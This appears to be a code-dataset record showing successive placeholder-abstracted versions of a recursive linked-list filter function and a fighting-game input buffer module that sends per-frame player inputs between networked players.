[ "__author__ = 'AChen'\n\nfrom rec_linked_list import *\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "__author__ = 'AChen'\nfrom rec_linked_list import *\n\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "__author__ = 'AChen'\n<import token>\n\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "<assignment token>\n<import token>\n\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "<assignment token>\n<import token>\n<function token>\n" ]
false
67
4789546128263bd298f8f5827734f8402747b9ac
from enum import Enum

from roll.input import Input
from roll.network import Server, Client

from assets.game_projects.fighter.src.game_properties import GameProperties
from assets.game_projects.fighter.src.network_message import NetworkMessage


class InputBuffer:
    """
    Responsible for collecting game input from both players. The game state will pull data from here if needed.
    Network messages will also update the input buffer when receiving data from the opposite player.
    """

    class Value(Enum):
        LEFT = "l"
        RIGHT = "r"
        UP = "u"
        DOWN = "d"
        WEAK_PUNCH = "wp"

    def __init__(
        self,
        left_action_name: str,
        right_action_name: str,
        weak_punch_action_name: str,
        frame_limit=12,
    ):
        self._inputs = {}  # frame number -> list of input values for that frame
        self.left_action_name = left_action_name
        self.right_action_name = right_action_name
        self.weak_punch_action_name = weak_punch_action_name
        self._frame_limit = frame_limit

    def __str__(self):
        return f"{self._inputs}"

    def __repr__(self):
        return f"{self._inputs}"

    @property
    def values(self) -> list:
        # materialize the dict view so the return value matches the annotation
        return list(self._inputs.values())

    def add_input(self, input, frame: int) -> None:
        if frame in self._inputs:
            self._inputs[frame].append(input.value)
        else:
            self._inputs[frame] = [input.value]

    def get_inputs(self) -> dict:
        return self._inputs

    def get_frame_inputs(self, frame: int) -> list:
        return self._inputs.get(frame, [])

    def is_empty(self) -> bool:
        return len(self._inputs) == 0

    def clear(self):
        self._inputs.clear()

    def poll_client_inputs(self, frame: int) -> None:
        if Input.is_action_pressed(action_name=self.left_action_name):
            self.add_input(input=InputBuffer.Value.LEFT, frame=frame)
        elif Input.is_action_pressed(action_name=self.right_action_name):
            self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)
        if Input.is_action_pressed(action_name=self.weak_punch_action_name):
            self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)

        # expire inputs that have fallen outside the rolling frame window
        self._inputs.pop(frame - self._frame_limit, None)


class OutgoingNetworkInputBuffer(InputBuffer):
    def __init__(
        self,
        left_action_name: str,
        right_action_name: str,
        weak_punch_action_name: str,
        frame_limit=12,
    ):
        super().__init__(
            left_action_name=left_action_name,
            right_action_name=right_action_name,
            weak_punch_action_name=weak_punch_action_name,
            frame_limit=frame_limit,
        )
        self.game_properties = GameProperties()

    def poll_client_inputs(self, frame: int) -> None:
        super().poll_client_inputs(frame=frame)
        # mirror this frame's local inputs to the remote peer
        frame_inputs = self.get_frame_inputs(frame=frame)
        if frame_inputs:
            if self.game_properties.is_server:
                Server.send_message_to_all_clients(
                    message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
                )
            else:
                Client.send_message_to_server(
                    message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}"
                )


class IncomingNetworkInputBuffer(InputBuffer):
    def __init__(self, frame_limit=12):
        super().__init__(
            left_action_name="",
            right_action_name="",
            weak_punch_action_name="",
            frame_limit=frame_limit,
        )
        self.game_properties = GameProperties()

    def add_input(self, input: str, frame: int) -> None:
        # network inputs arrive as raw value strings, not Value members
        if frame in self._inputs:
            self._inputs[frame].append(input)
        else:
            self._inputs[frame] = [input]

    def poll_client_inputs(self, frame: int) -> None:
        # TODO: Proper prediction; placeholder until rollback/prediction lands
        if not self.game_properties.has_received_network_inputs:
            pass

        self._inputs.pop(frame - self._frame_limit, None)
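The buffer's per-frame accumulation and expiry can be sanity-checked without the roll engine by calling add_input directly (poll_client_inputs needs roll's Input singleton, so it is bypassed here). A rough sketch: the action names are placeholders, and it assumes the roll and assets imports at the top of the module resolve.

buf = InputBuffer(left_action_name='p1_left',
                  right_action_name='p1_right',
                  weak_punch_action_name='p1_wp',
                  frame_limit=3)

buf.add_input(InputBuffer.Value.LEFT, frame=0)
buf.add_input(InputBuffer.Value.WEAK_PUNCH, frame=0)  # same-frame inputs accumulate
buf.add_input(InputBuffer.Value.RIGHT, frame=2)

assert buf.get_frame_inputs(0) == ['l', 'wp']         # enum .value strings are stored
assert buf.get_frame_inputs(1) == []                  # missing frames default to []

# poll_client_inputs() expires entries older than frame_limit every frame;
# the same pruning step, applied manually for frame 3:
buf._inputs.pop(3 - buf._frame_limit, None)           # 3 - 3 == frame 0
assert buf.is_empty() is False and buf.get_frame_inputs(0) == []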
[ "from enum import Enum\n\nfrom roll.input import Input\nfrom roll.network import Server, Client\n\nfrom assets.game_projects.fighter.src.game_properties import GameProperties\nfrom assets.game_projects.fighter.src.network_message import NetworkMessage\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n class Value(Enum):\n LEFT = \"l\"\n RIGHT = \"r\"\n UP = \"u\"\n DOWN = \"d\"\n WEAK_PUNCH = \"wp\"\n\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f\"{self._inputs}\"\n\n def __repr__(self):\n return f\"{self._inputs}\"\n\n @property\n def values(self) -> list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) -> dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) -> list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) -> bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) -> None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n super().__init__(\n left_action_name=left_action_name,\n right_action_name=right_action_name,\n weak_punch_action_name=weak_punch_action_name,\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) -> None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n else:\n Client.send_message_to_server(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n def __init__(self, frame_limit=12):\n super().__init__(\n left_action_name=\"\",\n right_action_name=\"\",\n weak_punch_action_name=\"\",\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) -> None:\n # TODO: Proper prediction\n if not self.game_properties.has_received_network_inputs:\n pass\n\n self._inputs.pop(frame - self._frame_limit, None)\n", "from enum import 
Enum\nfrom roll.input import Input\nfrom roll.network import Server, Client\nfrom assets.game_projects.fighter.src.game_properties import GameProperties\nfrom assets.game_projects.fighter.src.network_message import NetworkMessage\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. 
The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = 
frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <function token>\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if 
Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <function token>\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, 
frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: 
str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n <function token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <function token>\n 
